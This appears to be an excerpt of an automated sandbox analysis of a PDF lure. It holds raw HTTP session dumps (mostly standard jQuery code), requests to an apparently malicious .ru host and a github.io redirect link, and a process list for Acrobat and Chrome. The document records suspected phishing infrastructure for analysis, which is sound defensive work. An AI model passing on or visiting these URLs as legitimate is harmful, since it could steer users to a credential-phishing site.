                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                  2024-12-20 05:19:26 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                  2024-12-20 05:19:26 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                  2024-12-20 05:19:26 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449765104.21.49.704432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:27 UTC1311OUTGET /favicon.ico HTTP/1.1
                                                                  Host: 8g.tolirax.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://8g.tolirax.ru/3JCtG/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Ik1DWnF3eVo0RmtGRjNmTGJVR0VPUHc9PSIsInZhbHVlIjoiKzIxaVB0RFZ3TGtCVU82cGJIcldHZnhnY1FxbkNTMzF0VnZSQmF6eEo4c1Iyb0VicTVGM0xwemNlRTFNWGt1NTFrMkJMc2VOanFyZE5kenVQbHNVR1BkNkdLUEZzc3YrN2NSVVRzazI2K1NFTTIxUXBiTWdKZ0ZjekNta21mc1QiLCJtYWMiOiJkZGY4MDk2N2NjYjFmMTViMDU0MjRjY2UwZTc2MDRjZTNjMzk5ZTZjY2U2ZWRjZWYyY2EzZTZjMzEwMjI5NWVkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlFIMjczRWtJK0xxNFBrV1ZMR2M1bmc9PSIsInZhbHVlIjoiR21KUFBjbWpldjlqbHRiYzRMNXFQeDFJWVZoUmRveGZlaXJjM1NjcytNdGwwbTVqYTdkR1FHNkdFdkpzOExWQTQ3Y3JqQXkyZFFOMmlQRmdzK3RZSEFNZFNRVVdlcjlhU1M3N2JWRU9yUEdZRUhkcXFZMnJtWnZQOS9rWWNOeGkiLCJtYWMiOiIzZDU5NTRhYTU3ODQzNjY3ZDIxZjNjZWZlM2VkNDY5NjdjYWQ2ZjYzZDBkYjI4NWMxYjMxYjg5NGUzZDc3NzZmIiwidGFnIjoiIn0%3D
                                                                  2024-12-20 05:19:27 UTC1072INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 20 Dec 2024 05:19:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=14400
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3837&min_rtt=1684&rtt_var=3374&sent=33&recv=22&lost=0&retrans=0&sent_bytes=30818&recv_bytes=2985&delivery_rate=4634319&cwnd=257&unsent_bytes=0&cid=4b1fe8265a6c8697&ts=624&x=0"
                                                                  CF-Cache-Status: HIT
                                                                  Age: 3119
                                                                  Server: cloudflare
                                                                  CF-RAY: 8f4d2d72ec103344-EWR
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=2004&rtt_var=772&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1889&delivery_rate=1457085&cwnd=209&unsent_bytes=0&cid=7c3a316c2d5edb74&ts=4356&x=0"
                                                                  2024-12-20 05:19:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449770151.101.194.1374432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:28 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                  Host: code.jquery.com
                                                                  Connection: keep-alive
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept: */*
                                                                  Sec-Fetch-Site: none
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:28 UTC613INHTTP/1.1 200 OK
                                                                  Connection: close
                                                                  Content-Length: 89501
                                                                  Server: nginx
                                                                  Content-Type: application/javascript; charset=utf-8
                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                  ETag: "28feccc0-15d9d"
                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                  Access-Control-Allow-Origin: *
                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 20 Dec 2024 05:19:28 GMT
                                                                  Age: 3193500
                                                                  X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740021-EWR
                                                                  X-Cache: HIT, HIT
                                                                  X-Cache-Hits: 2774, 7
                                                                  X-Timer: S1734671969.606885,VS0,VE0
                                                                  Vary: Accept-Encoding
                                                                  2024-12-20 05:19:28 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                  2024-12-20 05:19:28 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                  Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                  2024-12-20 05:19:29 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                  Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                  2024-12-20 05:19:29 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                  Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                  2024-12-20 05:19:29 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                  Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                  2024-12-20 05:19:29 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                  Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.44977235.190.80.14432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:28 UTC532OUTOPTIONS /report/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Origin: https://8g.tolirax.ru
                                                                  Access-Control-Request-Method: POST
                                                                  Access-Control-Request-Headers: content-type
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:29 UTC336INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  access-control-max-age: 86400
                                                                  access-control-allow-methods: POST, OPTIONS
                                                                  access-control-allow-origin: *
                                                                  access-control-allow-headers: content-type, content-length
                                                                  date: Fri, 20 Dec 2024 05:19:28 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  8192.168.2.44977335.190.80.14432488C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-20 05:19:30 UTC476OUTPOST /report/v4?s=eeeNXmnhpt9%2FvngBOAkuJYcanjlCHZiR7D7HQEo%2Fq1vBnhfxkrdQdOr0EHJZ3QerJuBLDL28YuJ9CDo%2BiFWJKD2jGH2qnTLSyudlVXmdC4MiRFRlOcIqtHBv4h23Ug%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 421
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-20 05:19:30 UTC421OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 38 67 2e 74 6f 6c 69 72 61 78 2e 72 75 2f 33 4a 43 74 47 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 39 2e 37 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c
                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":329,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://8g.tolirax.ru/3JCtG/","sampling_fraction":1.0,"server_ip":"104.21.49.70","status_code":404,"type":"http.error"},"type":"network-error","url
                                                                  2024-12-20 05:19:30 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Fri, 20 Dec 2024 05:19:30 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Click to jump to process

                                                                  Click to jump to process

                                                                  Click to dive into process behavior distribution

                                                                  Click to jump to process

                                                                  Target ID:0
                                                                  Start time:00:18:43
                                                                  Start date:20/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Dec 2024_12192924_Image.pdf"
                                                                  Imagebase:0x7ff6bc1b0000
                                                                  File size:5'641'176 bytes
                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:1
                                                                  Start time:00:18:44
                                                                  Start date:20/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:3
                                                                  Start time:00:18:44
                                                                  Start date:20/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1712,i,7851807782142583231,13662592342447988891,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  Target ID:9
                                                                  Start time:00:19:08
                                                                  Start date:20/12/2024
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://us-east-2.protection.sophos.com/?d=purogosouls.github.io&u=aHR0cHM6Ly9wdXJvZ29zb3Vscy5naXRodWIuaW8vNjRkczZmNHM5ZDRmODlzZDRzZjQ2c2Q0ZjYv&i=NWQ0M2E1N2M3M2U5MzQxMGM1NjBhNmQ1&t=dEtlN04wQWZmZ0hqZlpiZEYwVXZ4NHFvc2NQNGtsUWl4Unlndk5helZOaz0=&h=356f16f6a39049efa5b305c7477e094a&s=AVNPUEhUT0NFTkNSWVBUSVZaHP6eDnex344kFPbGkNGwPXEfGJHtcvdIV0gRc1_JzA"
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  Target ID:10
                                                                  Start time:00:19:09
                                                                  Start date:20/12/2024
                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1932,i,8969801089404942635,6828313683208421111,262144 /prefetch:8
                                                                  Imagebase:0x7ff76e190000
                                                                  File size:3'242'272 bytes
                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  No disassembly